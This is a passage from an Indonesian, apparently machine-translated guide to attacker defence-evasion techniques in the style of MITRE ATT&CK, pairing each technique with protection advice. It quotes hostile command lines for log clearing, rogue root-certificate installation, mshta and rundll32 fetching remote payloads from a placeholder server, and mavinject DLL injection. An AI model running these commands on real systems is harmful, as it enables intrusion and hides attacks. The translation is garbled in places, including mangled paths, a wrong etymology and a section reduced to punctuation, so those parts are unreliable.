aplikasi wevtutil cl;
keamanan wevtutil cl.Log juga dapat dihapus menggunakan alat lain, seperti PowerShell.Rekomendasi perlindungan: Gunakan penyimpanan log peristiwa yang terpusat sehingga tidak mungkin untuk melihat dan mengelola log peristiwa pada mesin lokal. Jika memungkinkan, meminimalkan penundaan waktu saat melaporkan peristiwa untuk menghindari penyimpanan log jangka panjang pada sistem lokal. Lindungi file log peristiwa yang disimpan secara lokal dengan izin dan otentikasi yang tepat, batasi kemampuan musuh untuk meningkatkan hak istimewa. Gunakan alat untuk mengaburkan dan mengenkripsi file log saat disimpan secara lokal dan selama transfer. Monitor log untuk acara 1102: "Log audit telah dihapus."Sistem: Hak Windows :Deskripsi Pengguna : Berbagai utilitas Windows dapat digunakan untuk menjalankan perintah, mungkin tanpa menggunakan cmd. Misalnya, Forfile, asisten kompatibilitas program (pcalua.exe), komponen subsistem Windows untuk Linux (WSL), serta utilitas lain, dapat menjalankan program dan perintah dari antarmuka baris perintah, jendela Jalankan, atau melalui skrip.Penyerang dapat menyalahgunakan utilitas yang dijelaskan di atas untuk memotong alat keamanan, khususnya untuk peluncuran file sewenang-wenang hingga aktivitas mereka terdeteksi atau diblokir dengan berbagai cara, misalnya, menggunakan kebijakan grup yang melarang penggunaan CMD.Rekomendasi Perlindungan:Identifikasi dan blokir perangkat lunak yang berpotensi berbahaya dan berbahaya menggunakan AppLocker dan kebijakan pembatasan perangkat lunak. Mekanisme ini dapat digunakan untuk menonaktifkan atau membatasi akses pengguna ke utilitas yang dapat digunakan untuk secara tidak langsung menjalankan perintah.Sistem: Windows, Linux, macOS
Hak: Administrator, pengguna
Deskripsi: Sertifikat root digunakan untuk mengidentifikasi otoritas sertifikasi (CA). Ketika sertifikat root diinstal, sistem dan aplikasi akan mempercayai semua sertifikat dalam rantai sertifikat root. Sertifikat biasanya digunakan untuk membuat koneksi TLS / SSL aman di browser web. Jika pengguna mencoba membuka situs tempat sertifikat tidak dipercaya ditampilkan, pesan kesalahan akan muncul yang memperingatkan pengguna tentang risiko keamanan. Bergantung pada pengaturan keamanan, browser dapat melarang koneksi ke situs yang tidak terpercaya.
Menginstal sertifikat root dalam sistem yang diserang memungkinkan penyerang mengurangi keseluruhan tingkat keamanan sistem. Penyerang dapat menggunakan metode ini untuk menyembunyikan peringatan keamanan, sebagai akibatnya pengguna akan terhubung melalui HTTPS ke server web yang dikontrol musuh untuk mencuri kepercayaannya.
Sertifikat root yang asing juga dapat dipasang sebelumnya oleh pabrikan perangkat lunak baik selama rantai pasokan perangkat lunak dan digunakan bersama dengan malware dan adware, atau untuk memungkinkan serangan manusia di tengah untuk mencegat informasi yang dikirimkan melalui koneksi TLS / SSL yang aman.
Sertifikat root juga dapat dikloning dan diinstal ulang. rantai sertifikat tersebut dapat digunakan untuk menandatangani kode berbahaya untuk mem-bypass alat verifikasi tanda tangan yang digunakan untuk memblokir dan mendeteksi intrusi.
Pada macOS, malware Ay MaMi menggunakan perintah
/ usr / bin / keamanan add-trust-cert -d -r trustRoot -k / Library / Gantungan Kunci / Sistem / jalur gantungan kunci / ke / berbahaya / cert untuk mengatur sertifikat sebagai sertifikat root tepercaya di rantai sistem.
Rekomendasi keamanan: HTTP Public Key Pinning (HPKP) adalah salah satu cara melindungi terhadap serangan rantai sertifikat. HPKP mengasumsikan bahwa server memberi tahu klien serangkaian hash kunci publik, yang seharusnya menjadi satu-satunya yang tepercaya saat menyambung ke server ini untuk waktu tertentu.
Kebijakan Grup Windows dapat digunakan untuk mengelola sertifikat root dan mencegah non-administrator menginstal sertifikat root tambahan di repositori pengguna (HKCU):
HKEY_LOCAL_MACHINE \ SOFTWARE \ Policies \ Microsoft \ SystemCertificates \ Root \ ProtectedRoots \ Flags = 1.Akar sertifikat sistem tidak mungkin sering berubah, oleh karena itu, selama pemantauan sertifikat baru seseorang dapat mendeteksi aktivitas berbahaya atau memastikan bahwa tidak ada sertifikat yang tidak perlu atau mencurigakan. Microsoft menyediakan daftar sertifikat root tepercaya melalui authroot.stl. Utilitas Sysinternals Sigcheck dapat digunakan untuk membuang konten toko sertifikat (Sigcheck [64] .exe -tuv) dan mengidentifikasi sertifikat yang tidak termasuk dalam Daftar Kepercayaan Sertifikat Microsoft.
Sertifikat root yang diinstal terletak di registri di bagian berikut:
HKEY_LOCAL_MACHINE \ SOFTWARE \ Microsoft \ EnterpriseCertificates \ Root \ Certificates
HKEY_LOCAL_MACHINE [HKEY_CURRENT_USER] \ SOFTWARE [\ Kebijakan] \ Microsoft \ SystemCertificates \ Root \ CertificatesAda subset sertifikat root yang terus-menerus digunakan dalam sistem Windows yang dapat digunakan untuk pemantauan:
• 18F7C1FCC3090203FD5BAA2F861A754976C8DD25;
• 245C97DF7514E7CF2DF8BE72AE957B9E04741E85;
• 3B1EFD3A66EA28B16697394703A72CA340A05BD5;
• 7F88CD7223F3C813818C994614A89C99FA3B5247;
• 8F43288AD272F3103B6FB1428485EA3014C0BCFE;
• A43489159A520F0D93D032CCAF37E7FE20A8B419;
• BE36A4562FB2EE05DBB3D32323ADF445084ED656;
• CDD4EEAE6000AC7F40C3802C171E30148030C072.
Sistem: Windows
Hak: Pengguna
Deskripsi: InstallUtil adalah utilitas baris perintah Windows yang dapat menginstal dan menghapus aplikasi yang sesuai dengan spesifikasi .NET Framework. Installutil diinstal secara otomatis dengan VisualStudio. File InstallUtil.exe ditandatangani oleh sertifikat Microsoft dan disimpan di:
C: \ Windows \ Microsoft.NET \ Framework \ v [versi] \ InstallUtil.exePenyerang dapat menggunakan fungsionalitas InstallUtil untuk mengeksekusi kode proxy dan memotong daftar putih aplikasi.
Rekomendasi perlindungan: Ada kemungkinan bahwa InstallUtil tidak digunakan pada sistem Anda, jadi pertimbangkan untuk memblokir instalasi InstallUtil.exe.
Sistem: macOS
Hak: Pengguna, Administrator
Deskripsi: Dimulai dengan OS X 10.8, header LC_MAIN termasuk dalam executable mach-O, yang menunjukkan titik masuk kode biner untuk menjalankannya. Dalam versi sebelumnya, dua header LC_THREAD dan LC_UNIXTHREAD digunakan. Titik masuk untuk biner dapat dimodifikasi dan penambahan berbahaya pada awalnya akan dilakukan, dan kemudian eksekusi akan kembali ke titik awal sehingga korban tidak melihat apa-apa. Modifikasi file biner seperti itu adalah cara untuk mem-bypass daftar putih aplikasi, karena nama file dan jalur ke aplikasi akan tetap tidak berubah.
Rekomendasi perlindungan: Gunakan aplikasi yang hanya memiliki tanda tangan digital yang valid dari pengembang tepercaya. Memodifikasi header LC_MAIN akan membatalkan tanda tangan file dan mengubah checksum file.
Sistem: macOS
Hak: Pengguna, Administrator
Deskripsi: Launchctl - utilitas untuk mengelola layanan Launchd. Menggunakan Launchctl, Anda dapat mengelola layanan sistem dan pengguna (LaunchDeamons dan LaunchAgents), serta menjalankan perintah dan program. Launchctl mendukung sub-perintah baris perintah, interaktif atau dialihkan dari input standar:
launchctl submit -l [labelname] - / Path / to / thing / to / execute '' arg "'' arg" '' arg " .
Dengan memulai dan memulai kembali layanan dan daemon, penyerang dapat mengeksekusi kode dan bahkan mem-by-by-whitelist jika launchctl adalah proses yang diotorisasi, namun memuat, membongkar dan memulai kembali layanan dan daemon mungkin memerlukan hak yang lebih tinggi.
Rekomendasi Keamanan: Membatasi hak pengguna untuk membuat Agen Peluncuran dan meluncurkan Deamons Peluncuran menggunakan Kebijakan Grup. Menggunakan aplikasi
KnockKnock ,
Anda dapat menemukan program yang menggunakan launchctl untuk mengelola Launch Agents dan Launch Deamons.
Sistem: Windows, Linux, macOS
Deskripsi: Masquerading terjadi ketika nama atau lokasi file yang dapat dieksekusi, legal atau berbahaya, mengalami berbagai manipulasi dan penyalahgunaan untuk menghindari perlindungan. Beberapa opsi penyamaran diketahui.
Satu opsi adalah agar executable ditempatkan di direktori yang diterima secara umum atau diberi nama program yang sah dan tepercaya. Nama file mungkin mirip dengan nama program yang sah. Metode masking ini digunakan untuk memotong alat yang mempercayai file berdasarkan nama atau jalur ke file, serta untuk menipu administrator sistem.
WindowsCara lain untuk memaksimalkan adalah agar penyerang menggunakan salinan modifikasi dari utilitas yang sah, seperti rundll32.exe. Dalam hal ini, utilitas yang sah dapat dipindahkan ke direktori lain dan diganti namanya untuk menghindari deteksi berdasarkan pemantauan peluncuran utilitas sistem dari lokasi yang tidak standar.
Contoh penyalahgunaan direktori tepercaya di Windows adalah direktori C: \ Windows \ System32. Nama-nama utilitas sistem tepercaya seperti explorer.exe atau svchost.exe dapat ditugaskan ke binari jahat.
LinuxMetode masking selanjutnya adalah menggunakan file biner berbahaya yang, setelah memulai, mengubah nama prosesnya menjadi nama proses yang sah dan andal. Contoh dari direktori tepercaya di Linux adalah direktori / bin, dan nama-nama seperti rsyncd atau dbus-inotifier dapat menjadi nama tepercaya.
Rekomendasi keamanan
: Saat membuat berbagai aturan keamanan, hindari pengecualian berdasarkan nama dan jalur file. Membutuhkan penandatanganan file biner. Gunakan kontrol akses sistem file untuk melindungi direktori tepercaya, seperti C: \ Windows \ System32. Jangan gunakan alat untuk membatasi pelaksanaan program berdasarkan nama atau jalur ke file.
Identifikasi dan blokir perangkat lunak yang berpotensi berbahaya dan berbahaya yang mungkin terlihat seperti program yang sah.
Sistem: Windows
Hak: Pengguna, administrator, sistem
Deskripsi: Penyerang dapat memodifikasi registri untuk menyembunyikan informasi dalam kunci registri atau menghapus informasi selama proses pembersihan jejak intrusi atau pada tahap lain serangan.
Akses ke area registri tertentu tergantung pada izin akun. Utilitas Reg bawaan dapat digunakan untuk modifikasi registri lokal dan jarak jauh. Alat akses jarak jauh lain yang berinteraksi dengan registri melalui API Windows dapat digunakan.
Perubahan pada registri dapat mencakup tindakan untuk menyembunyikan kunci, misalnya, dengan menambahkan kunci dengan nama dari karakter nol. Membaca kunci seperti itu melalui Reg atau API akan menghasilkan kesalahan atau akan diabaikan. Penyerang dapat menggunakan pseudo-key tersembunyi seperti itu untuk menyembunyikan muatan dan perintah yang digunakan dalam proses konsolidasi dalam sistem.
Registri sistem jarak jauh juga dapat diubah jika layanan Remote Regisry aktif pada sistem target. Biasanya, penyerang juga memerlukan kredensial yang valid, serta akses ke Windows Admin Share untuk menggunakan RPC.
Rekomendasi perlindungan: Pengaturan izin yang salah dalam registri dapat menyebabkan fakta bahwa penyerang dapat mengeksekusi kode arbitrer (
Kelemahan Izin Pendaftaran Layanan ). Pastikan bahwa pengguna tidak dapat mengubah kunci komponen sistem. Memblokir utilitas sistem yang tidak perlu dan perangkat lunak lain yang dapat digunakan untuk memodifikasi registri. Pertimbangkan mengaktifkan audit registri (Event ID4657), tetapi perlu diingat bahwa perubahan registri yang dibuat menggunakan alat seperti RegHide tidak akan dicatat oleh layanan pengumpulan acara OS.
Sistem: Windows
Hak: Pengguna
Deskripsi: Mshta.exe (terletak di
C: \ Windows \ System32 \ ) adalah utilitas yang menjalankan aplikasi Microsoft HTML (* .HTA). Aplikasi HTA berjalan menggunakan teknologi yang sama seperti yang digunakan InternetExplorer, tetapi di luar browser. Karena fakta bahwa Mshta memproses file melewati pengaturan keamanan browser, penyerang dapat menggunakan mshta.exe untuk proksi eksekusi file HTA berbahaya, Javascript atau VBScript. File jahat dapat diluncurkan melalui skrip bawaan:
mshta vbscript: Tutup (Jalankan ("GetObject (" "script: https [:] // webserver / payload [.] sct" ")")))atau langsung, di URL:
mshta http [:] // webserver / payload [.] htaRekomendasi perlindungan: Fungsionalitas mshta.exe dikaitkan dengan versi IE yang lebih lama yang telah mencapai akhir siklus hidupnya. Blokir Mshta.exe jika Anda tidak menggunakan fungsinya.
Sistem: Windows
Deskripsi: Bagian NTFS berisi Master File Table (MFT), yang menyimpan data tentang isi volume, baris yang berhubungan dengan file, dan kolom dengan atributnya, termasuk atribut seperti atribut Extended (EA) - string 64 kb) dan Aliran alternatif (Aliran Data Alternatif (ADS) - metadata dengan ukuran arbitrer) yang dapat digunakan untuk menyimpan data apa pun. Penyerang dapat menyimpan data berbahaya dan file biner dalam atribut yang diperluas dan file metadata. Teknik ini memungkinkan Anda untuk melewati beberapa alat perlindungan, seperti alat pemindaian berbasis indikator statis dan beberapa alat anti-virus.
Rekomendasi perlindungan: Memblokir akses ke EA dan ADS bisa sangat kompleks dan tidak sesuai dan, selain itu, menyebabkan operasi fungsi OS standar yang tidak stabil. Arahkan vektor perlindungan untuk mencegah perangkat lunak tidak dimulai, yang dengannya Anda dapat menyembunyikan informasi dalam EA dan ADS.
Sistem: Windows
Hak: Administrator, pengguna
Deskripsi: Koneksi ke folder jaringan dan Windows Admin Share dapat dihapus jika tidak diperlukan lagi. Net adalah contoh utilitas yang dapat digunakan untuk menghapus koneksi jaringan:
net use \ system \ share / delete . Lawan dapat menghapus koneksi jaringan yang mereka tidak perlu menghapus jejak intrusi.
Kiat Keamanan: Ikuti praktik terbaik untuk mengatur Windows Admin Share. Identifikasi utilitas sistem dan perangkat lunak yang tidak perlu yang dapat digunakan untuk terhubung ke jaringan berbagi dan pertimbangkan untuk mengaudit penggunaan atau pemblokirannya.
Sistem: Windows, Linux, macOS
Deskripsi: Penyerang dapat menggunakan enkripsi, enkripsi, dan semua jenis metode untuk mengaburkan file dan kontennya di sistem atau selama transfer.
Payload dapat diarsipkan atau dienkripsi, kadang-kadang untuk deobfusi dan peluncuran berikutnya, beberapa tindakan pengguna diperlukan, misalnya, memasukkan kata sandi untuk membuka arsip yang disiapkan oleh penyerang.
Untuk menyembunyikan baris teks biasa, bagian file juga dapat disandikan. Payload dapat dibagi menjadi file "jinak" yang terpisah, yang, ketika dikumpulkan secara keseluruhan, melakukan fungsionalitas berbahaya.
Lawan juga dapat mengaburkan perintah yang dipanggil dari payload secara langsung atau melalui antarmuka baris perintah. Variabel lingkungan, alias, dan karakter khusus untuk platform atau bahasa semantik dapat digunakan untuk memotong deteksi malware berdasarkan tanda tangan dan daftar putih.
Contoh lain kebingungan adalah penggunaan steganografi - teknik menyembunyikan data atau kode dalam gambar, trek audio, video dan file teks.
Rekomendasi perlindungan: Gunakan alat analisis dan deteksi malware yang memeriksa tidak hanya kode sumber itu sendiri, tetapi juga menganalisis proses menjalankan perintah. Pada Windows 10, fungsi ini disajikan sebagai Antarmuka Pemindaian Antimalware (AMSI).
Kehadiran karakter escape dalam perintah, seperti ^ atau ", dapat berfungsi sebagai indikator kebingungan. Menggunakan Windows Sysmon dan event ID 4688 event, Anda dapat melihat argumen perintah yang dieksekusi dalam berbagai proses.
Kebingungan yang digunakan dalam muatan selama fase akses awal dapat dideteksi pada jaringan menggunakan sistem IDS dan gateway keamanan email yang mengidentifikasi data terkompresi, terenkripsi dan skrip dalam file terlampir. Identifikasi payload yang dikirim melalui koneksi terenkripsi dari situs web dapat dilakukan dengan memeriksa lalu lintas terenkripsi.
Sistem: macOS
Hak: Pengguna, Administrator
Deskripsi: Penyerang dapat memodifikasi file plist dengan menentukan di dalamnya kode mereka sendiri untuk dieksekusi dalam konteks pengguna lain. File properti plist yang terletak di / Library / Preferences dijalankan dengan privilege yang ditinggikan, dan file plist dari ~ / Library / Preferences dijalankan dengan privilege pengguna.
Kiat Keamanan
: Cegah file plist agar tidak dimodifikasi dengan membuatnya hanya baca.
Sistem: Linux, macOS
Hak: Pengguna
Deskripsi: Penyerang dapat menggunakan metode Port Knocking untuk menyembunyikan port terbuka yang mereka gunakan untuk terhubung ke sistem.
Tip
Keamanan: Menggunakan firewall stateful dapat mencegah beberapa opsi Port Knocking diimplementasikan.
Sistem: Windows
Hak: Pengguna, Administrator, Sistem
Deskripsi: Transactional NTFS (TxF) adalah teknologi yang diperkenalkan untuk pertama kali di Vista yang memungkinkan operasi file menggunakan transaksi. Di TxF, hanya satu deskriptor transaksi yang dapat menulis file saat ini, semua deskriptor lainnya akan diisolasi dan hanya akan dapat membaca versi file yang dikunci pada saat pembukaan. Jika sistem atau aplikasi macet, maka TxF akan secara otomatis mengembalikan perubahan ke file. TxF masih termasuk dalam Windows 10.
Proses Teknik Doppelganging (dari "transmisi dua tahap" Jerman, "double-stroke") melibatkan penggunaan fungsi WinAPI yang tidak terdokumentasi dan diimplementasikan dalam 4 langkah:
- Transaksi Transaksi NTFS dibuat menggunakan executable yang diserang, dan versi modifikasi yang dapat dieksekusi dibuat sebagai bagian dari transaksi.
- Unduh Bagian yang dibagi dibuat dalam memori yang memuat versi modifikasi dari file yang dapat dieksekusi.
- Kembalikan. Transaksi NTFS dibatalkan, akibatnya file yang diserang asli disimpan pada disk dalam bentuk aslinya.
- Animasi. Menggunakan versi modifikasi dari file yang dapat dieksekusi yang tetap dalam RAM, suatu proses dibuat dan eksekusi dimulai.
Dengan demikian, kode jahat akan berfungsi dalam konteks proses tepercaya yang sah. Mengingat bahwa serangan itu hanya terjadi di memori, karena Transaksi NTFS tidak selesai, tetapi dibatalkan, tidak ada jejak aktivitas jahat akan tetap pada disk.
Kiat Keamanan: Tindakan keamanan preventif dalam bentuk upaya memblokir panggilan API tertentu cenderung memiliki efek samping negatif. Vektor perlindungan harus diarahkan untuk mencegah peluncuran alat jahat pada tahap awal rantai serangan. Doppelganging dapat digunakan untuk menghindari fitur keamanan, namun, masih merupakan praktik yang baik untuk memblokir aplikasi yang berpotensi berbahaya dan membatasi penggunaan perangkat lunak menggunakan daftar putih. Deteksi serangan dilakukan dengan menganalisis panggilan ke fungsi CreateTransaction, CreateFileTransacted, RollbackTransaction API, fungsi tidak berdokumen seperti NTCreateProcessEX, NtCreateThreadEX, dan panggilan API yang digunakan untuk mengubah memori dalam proses lain, seperti WriteProcessMemory.
Sistem: Windows
Hak: Pengguna
Deskripsi: Serangan dilakukan dengan mengganti gambar file yang dapat dieksekusi dari proses selama penangguhan proses. Ini adalah salah satu dari sepuluh teknik dasar untuk proses injeksi .Kiat Keamanan: Tindakan keamanan preventif dalam bentuk upaya memblokir panggilan API tertentu cenderung memiliki efek samping negatif. Vektor perlindungan harus diarahkan untuk mencegah peluncuran alat jahat pada tahap awal rantai serangan. Proses Hollowing dapat digunakan untuk menghindari fitur keamanan, namun, tetap merupakan praktik yang baik untuk memblokir aplikasi yang berpotensi berbahaya dan membatasi penggunaan perangkat lunak menggunakan daftar putih.Sistem: Windows, Linux, macOSHak: Pengguna, administrator, sistem, rootKeterangan: Proses injeksi adalah metode untuk mengeksekusi kode arbitrer di ruang alamat dari proses hidup terpisah. Menjalankan kode dalam konteks proses lain memungkinkan Anda untuk mengakses memori dari proses yang disuntikkan, sumber daya sistem / jaringan, dan kemungkinan hak istimewa yang ditingkatkan. Suntikan proses juga dapat digunakan untuk menghindari kemungkinan deteksi aktivitas jahat dengan cara keamanan. Teknik untuk menerapkan injeksi ke dalam proses didasarkan pada penyalahgunaan berbagai mekanisme yang memastikan multithreading pelaksanaan program di OS. Berikut ini adalah beberapa pendekatan untuk menyuntikkan kode ke dalam suatu proses.Windows• injeksi DLL. Mereka dilakukan dengan menulis lintasan ke DLL berbahaya di dalam proses dan kemudian mengeksekusinya dengan membuat utas jauh (Utas jauh - utas yang berjalan di ruang alamat virtual proses lain). Dengan kata lain, malware menulis DLL ke disk dan kemudian menggunakan fungsi seperti CreateRemoteTread, yang akan memanggil fungsi LoadLibrary dalam proses yang disuntikkan.• Injeksi PE (Injeksi portabel yang dapat dijalankan) didasarkan pada penyalahgunaan fitur eksekusi memori file-PE, seperti DLL atau EXE. Kode berbahaya ditulis ke proses tanpa menulis file apa pun ke disk, dan kemudian eksekusi disebut menggunakan kode tambahan atau dengan membuat aliran jarak jauh.• Pembajakan eksekusi thread melibatkan menyuntikkan kode berbahaya atau jalur DLL langsung ke utas proses. Seperti teknik Proses Pelek, aliran pertama-tama harus ditunda.• Injeksi ke injeksi Asynchronous Procedure Call (APC) melibatkan penyisipan kode jahat ke dalam Antrian APC dari utas proses. Salah satu metode injeksi APC, yang disebut "injeksi Earle Bird", melibatkan pembuatan proses yang ditangguhkan di mana kode berbahaya dapat ditulis dan diluncurkan ke titik masuk proses melalui APC. AtomBombing adalah opsi injeksi lain yang menggunakan APC untuk memohon kode jahat yang sebelumnya ditulis ke tabel atom global.• Injeksi injeksi Local Storage (TLS) Thread melibatkan manipulasi pointer memori di dalam file PE yang dapat dieksekusi untuk mengarahkan proses ke kode berbahaya.Mac dan Linux• Variabel sistem LD_RPELOAD, LD_LIBRARY_PATH (Linux), DYLIB_INSERT_LIBRARY (macOS X) atau antarmuka pemrograman aplikasi dlfcn (API) dapat digunakan untuk memuat perpustakaan secara dinamis (objek bersama) ke dalam proses, yang pada gilirannya dapat digunakan untuk mencegat panggilan API dari menjalankan proses.• Panggilan sistem Ptrace dapat digunakan untuk menghubungkan ke proses yang sedang berjalan dan mengubahnya saat sedang berjalan.• / proc / [pid] / mem menyediakan akses ke memori proses dan dapat digunakan untuk membaca / menulis data arbitrer, namun metode ini jarang digunakan karena kompleksitas implementasinya.• Pengambilan VDSO (Objek bersama dinamis dinamis) memungkinkan Anda untuk menyuntikkan kode saat menjalankan binari ELF dengan memanipulasi kode bertopik dari linux-vdso.so.Program jahat biasanya menggunakan injeksi kode ke dalam proses untuk mengakses sumber daya sistem, yang memungkinkan penyerang mendapatkan pijakan di sistem dan melakukan perubahan lain di lingkungan yang diserang. Sampel yang lebih kompleks dapat melakukan beberapa suntikan proses untuk membuatnya sulit dideteksi.Rekomendasi Perlindungan:Metode menyuntikkan kode ke dalam proses didasarkan pada penyalahgunaan fungsi OS biasa, dampak langsung yang dapat menyebabkan operasi perangkat lunak dan produk keamanan yang tidak stabil dapat berjalan. Upaya untuk mencegah penggunaan teknik intersepsi perlu fokus pada tahap awal rantai serangan. Gunakan alat untuk memblokir perangkat lunak yang berpotensi berbahaya, seperti AppLocker. Gunakan Yama sebagai tindakan pencegahan terhadap injeksi kode di ptrace, membatasi penggunaan ptrace hanya untuk pengguna yang memiliki hak istimewa. Langkah-langkah keamanan tambahan dapat mencakup penyebaran modul keamanan kernel yang memberikan kontrol akses tingkat lanjut dan pembatasan proses. Alat-alat tersebut termasuk SELinux, grsecurity, AppArmor.Sistem: Windows, Linux, macOSHak: Pengguna, Administrator, Deskripsi Sistem:Penyerang dapat secara bersamaan menggunakan beberapa alat akses jarak jauh dengan protokol kontrol yang berbeda untuk mendiversifikasi risiko deteksi. Jadi, jika salah satu alat akses jarak jauh terdeteksi dan diblokir, tetapi pihak yang membela belum mengidentifikasi semua alat penyerang, maka akses jarak jauh ke jaringan yang diserang masih akan dipertahankan. Penyerang juga dapat mencoba untuk mendapatkan akses ke akun yang valid dari layanan korporat jarak jauh, seperti VPN, untuk mendapatkan akses alternatif ke sistem jika memblokir alat dasar akses jarak jauh. Menggunakan web-shell juga merupakan salah satu cara untuk mengakses jaringan dari jarak jauh melalui server web.Rekomendasi Perlindungan:Pantau keberadaan dan pemblokiran peluncuran alat akses jarak jauh yang dikenal di jaringan Anda (AmmyAdmin, Radmin, RemotePC, VNC, dll.), Gunakan alat untuk mengontrol peluncuran aplikasi dan memblokir perangkat lunak yang berpotensi berbahaya. Pengenalan sistem IDS dan IPS yang mendeteksi malware tertentu menggunakan tanda tangan akan mengurangi kemungkinan serangan yang berhasil, tetapi seiring waktu, penyerang akan memodifikasi alat mereka untuk mengubah tanda tangan dan, sebagai hasilnya, mem-bypass sistem IDS dan IPS.Sistem: Hak Windows : Pengguna, AdministratorKeterangan: Regsvcs dan Regasm adalah utilitas utilitas Windows yang digunakan untuk mendaftar dengan sistem perakitan .NET Component Object Model (COM). Kedua file ditandatangani secara digital oleh Microsoft. Penyerang dapat menggunakan Regsvcs dan Regasm untuk eksekusi kode proxy, ketika atributnya adalah kode yang harus dijalankan sebelum mendaftar atau membatalkan pendaftaran: [Fungsi ComRegister] atau [Fungsi ComUnregister]. Kode dengan atribut tersebut dapat diluncurkan bahkan jika proses berjalan dengan hak istimewa yang tidak memadai atau bahkan macet saat startup.Rekomendasi perlindungan: Blokir Regsvcs.exe dan Regasm.exe jika tidak digunakan di sistem atau jaringan Anda.Sistem: Windows, Linux, macOSHak: Administrator, Sistem, rootKeterangan: Rootkit adalah program yang menyembunyikan keberadaan malware dengan menyadap dan memodifikasi panggilan API. Rootkit dapat bekerja pada level pengguna, kernel OS, atau bahkan lebih rendah, pada level hypervisor, MBR, atau firmware sistem. Lawan menggunakan rootkit untuk menyembunyikan keberadaan program, file, koneksi jaringan, driver, dan komponen OS lainnya.Rekomendasi perlindungan: Identifikasi dan blokir perangkat lunak yang berpotensi berbahaya yang mungkin berisi rootkit menggunakan perangkat lunak daftar putih perangkat, alat antivirus, atau alat perlindungan OS bawaan.Sistem: Hak Windows :Deskripsi Pengguna : Rundll32.exe adalah utilitas sistem untuk meluncurkan program yang terletak di pustaka yang terhubung secara dinamis; dapat dipanggil ke file biner proksi, jalankan file kontrol Windows (.cpl) melalui fungsi shel32.dll tidak berdokumen - Control_RunDLL dan Control_RunDLLAsUser . Mengklik dua kali pada file .cpl juga menyebabkan Rundll32.exe dijalankan. Rundll32 juga dapat digunakan untuk mengeksekusi skrip seperti JavaScript:rundll32.exe javascript: "\ .. \ mshtml, RunHTMLApplication"; document.write (); GetObject ("scrirpt: https [:] // www [.] Contoh [ .] com / malicious.sct ")"Metode menggunakan rundll32.exe di atas terdeteksi oleh perangkat lunak antivirus seperti virus seperti Poweliks.Rekomendasi perlindungan: Attack Surface Reduction (ASR) di EMET dan Advanced Theart Protection di Windows Defender dapat memblokir penggunaan Rundll32.exe untuk mem-bypass daftar putih.Sistem: Hak Windows : Administrator,Deskripsi Sistem : Penyerang dapat memodifikasi komponen arsitektur untuk menandatangani dan memverifikasi tanda tangan digital kode Windows untuk memotong cara mengendalikan peluncuran program yang memungkinkan hanya kode yang ditandatangani untuk dijalankan. Untuk membuat, menandatangani, dan memverifikasi tanda tangan file dari berbagai format di Windows, apa yang disebut Subject Interface Package (SIP) digunakan - spesifikasi perangkat lunak yang unik untuk setiap jenis file, di mana interaksi antara fungsi API yang memulai pembuatan, perhitungan dan verifikasi tanda tangan dan secara langsung file. Validitas tanda tangan dikonfirmasi menggunakan yang disebut Trust Provider.- Ini adalah komponen perangkat lunak dari OS yang melakukan berbagai prosedur terkait dengan perhitungan dan verifikasi tanda tangan digital.Metode serangan populer:- Modifikasi DLL dan kunci FuncName di bagian CryptSIPDllGetSignedDataMsg :
HKEY_LOCAL_MACHINE \ SOFTWARE \ Microsoft \ Cryptography \ OID \ EncodingType 0 \ CryptSIPDllGetSignedDataMsg \ [SIP_GUID] .
Ini dilakukan dengan tujuan mengganti DLL-library yang menyediakan fungsi CryptSIPDllGetSignedDataMSG , . (, Microsoft ) SIP. , , , , , , , . - DLL FuncName :
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllVerifyIndirectData/[SIP_GUID] .
DLL-, CryptSIPDllVerifyIndirectData , , , , , (True/False). , c SIP. , DLL-. - DLL FuncName :
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\Providers\Trust\FinalPolicy/[Trust Provider GUID] .
DLL-, FinalPolicy Trust Provider, , . CryptSIPDllVerifyIndirectData, DLL-.
Penting untuk dicatat bahwa serangan yang dijelaskan pada mekanisme kepercayaan Windows dapat diimplementasikan menggunakan teknik Pembajakan Pesanan Penelusuran DLL.Rekomendasi perlindungan: Pastikan bahwa pengguna sistem yang dilindungi tidak dapat memodifikasi kunci registri yang terkait dengan komponen SIP dan Trust Provider. Pertimbangkan untuk menghapus SIP yang tidak perlu dan usang. Gunakan segala macam cara untuk memblokir unduhan DLL jahat, misalnya, yang dibangun ke dalam Windows AppLocker dan DeviceGuard.Sistem: Windows, Linux, macOSHak: Deskripsi Pengguna : Penyerang dapat menggunakan skrip untuk mengotomatiskan tindakan mereka, mempercepat tugas operasional dan, sebagai hasilnya, mengurangi waktu yang diperlukan untuk mendapatkan akses. Beberapa bahasa scripting dapat digunakan untuk mem-bypass mekanisme untuk proses pemantauan dengan secara langsung berinteraksi dengan OS di tingkat API alih-alih memanggil program lain. Skrip dapat disematkan dalam dokumen Office sebagai makro dan kemudian digunakan untuk serangan phishing. Dalam hal ini, para penyerang mengharapkan pengguna untuk menjalankan file makro atau bahwa pengguna setuju untuk mengaktifkan makro. Ada beberapa kerangka kerja populer untuk mengimplementasikan scripting - Metasploit, Veil, PowerSploit.Kiat Keamanan: Batasi akses ke skrip seperti VBScript atau PowerShell. Di Windows, konfigurasikan pengaturan keamanan MS Office dengan mengaktifkan tampilan aman dan larangan makro melalui GPO. Jika makro diperlukan, maka hanya jalankan makro yang tepercaya secara digital untuk dijalankan. Gunakan segmentasi mikro dan virtualisasi aplikasi, misalnya, Sandboxie untuk Windows dan Apparmor, Docker untuk Linux.Sistem: Hak Windows :Deskripsi Pengguna : File biner yang ditandatangani dengan sertifikat digital tepercaya dapat dijalankan pada sistem Windows yang dilindungi oleh verifikasi tanda tangan digital. Beberapa file Microsoft yang ditandatangani secara default selama instalasi Windows dapat digunakan untukmem -proksi peluncuran file lain: • Mavinject.exe adalah utilitas Windows yang memungkinkan kode untuk dieksekusi. Mavinject dapat digunakan untuk memasukkan DLL ke dalam proses yang sedang berjalan:"C: \ Program Files \ Common Files \ microsoft shared \ ClickToRun \ MavInject32.exe" [PID] / INJECTRUNNING [PATH DLL];C: \ Windows \ system32 \ mavinject.exe [PID] / INJECTRUNNING [PATH DLL];• SyncAppvPublishingServer.exe - dapat digunakan untuk menjalankan skrip PowerShell tanpa menjalankan PowerShell.exe.Ada beberapa binari yang serupa .Rekomendasi perlindungan: Banyak file yang ditandatangani mungkin tidak digunakan di sistem Anda, jadi pertimbangkan untuk memblokir peluncurannya.Sistem: Hak Windows :Deskripsi Pengguna : Skrip yang ditandatangani dengan sertifikat tepercaya dapat digunakan untuk proksi file berbahaya, misalnya, PubPrn.vbs ditandatangani dengan 